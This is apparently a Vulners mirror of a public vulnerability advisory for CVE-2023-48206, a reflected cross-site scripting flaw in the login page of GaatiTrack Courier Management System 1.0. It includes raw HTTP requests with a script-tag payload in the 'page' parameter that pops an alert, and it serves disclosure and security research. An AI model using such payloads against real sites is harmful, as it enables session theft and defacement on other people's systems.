Lucene search
K

GaatiTrack Courier Management System 1.0 Cross Site Scripting

🗓️ 20 Nov 2023 00:00:00Reported by Rahad ChowdhuryType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 425 Views

GaatiTrack Courier Management System 1.0 XSS vulnerability in login page allows execution of arbitrary web scripts or HTML

Related
Code
ReporterTitlePublishedViews
Family
0day.today
GaatiTrack Courier Management System 1.0 Cross Site Scripting Vulnerability
20 Nov 202300:00
zdt
ATTACKERKB
CVE-2023-48206
7 Dec 202307:15
attackerkb
Circl
CVE-2023-48206
30 Dec 202311:36
circl
CNNVD
GaatiTrack Courier Management System Cross-Site Scripting Vulnerability
20 Nov 202300:00
cnnvd
CVE
CVE-2023-48206
7 Dec 202300:00
cve
Cvelist
CVE-2023-48206
7 Dec 202300:00
cvelist
EUVD
EUVD-2023-52286
3 Oct 202520:07
euvd
NVD
CVE-2023-48206
7 Dec 202307:15
nvd
Prion
Cross site scripting
7 Dec 202307:15
prion
Positive Technologies
PT-2023-30731 · Unknown · Gaatitrack Courier Management System
6 Dec 202300:00
ptsecurity
Rows per page
`# Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple  
Cross-site scripting  
# Date: 12/112023  
# Exploit Author: BugsBD Security Researcher (Rahad Chowdhury)  
# Vendor Homepage: https://www.mayurik.com/  
# Software Link:  
https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php  
# Version: v1.0  
# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56  
# CVE: CVE-2023-48206  
  
Description:  
Multiple reflected cross-site scripting (XSS) vulnerability exists in  
login.php, header.php page of GaatiTrack Courier Management System v1.0  
that allows attackers to execute arbitrary web scripts or HTML via a  
crafted payload injected into the Website login page parameter.  
  
Steps to Reproduce:  
1. Go to login and capture request data using burp suite. Your request data  
will be:  
  
GET /gaatitrack/login.php HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp  
Upgrade-Insecure-Requests: 1  
  
2. Now use XSS payload in login.php. So your request data will be:  
GET  
/gaatitrack/login.php?page=1</title><script>alert(document.domain)</script>  
HTTP/1.1  
Host: 192.168.1.74  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/119.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Connection: close  
Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp  
Upgrade-Insecure-Requests: 1  
  
3. Forward You request data and check browser. You will be popup with  
domain.  
  
## Reproduce:  
[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation